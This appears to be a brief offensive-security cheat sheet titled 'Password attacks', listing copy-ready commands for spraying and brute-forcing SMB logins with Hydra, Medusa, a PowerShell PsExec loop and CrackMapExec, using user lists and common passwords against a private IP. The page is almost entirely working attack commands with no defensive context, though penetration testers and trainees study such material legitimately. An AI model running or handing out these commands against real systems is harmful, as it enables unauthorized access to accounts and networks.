Password attacks
Hydra
hydra -L Common\ users\ list.txt -p Password1 -e s -V 192.168.95.11 smbMedusa
medusa -h 192.168.95.11 -U Common\ users\ list.txt -p Welcome1 -M smbnt -m GROUP:DOMAINPowershell
ForEach ($file in (Get-Content "list.txt")) {write-host "Attempting user: $file" -ForegroundColor red ;.\PsExec.exe -u $file -p 'Password1' cmd.exe}Crackmapexec
crackmapexec smb targets.txt -u "username" -p "password" --local-authPassword cracking training
Last updated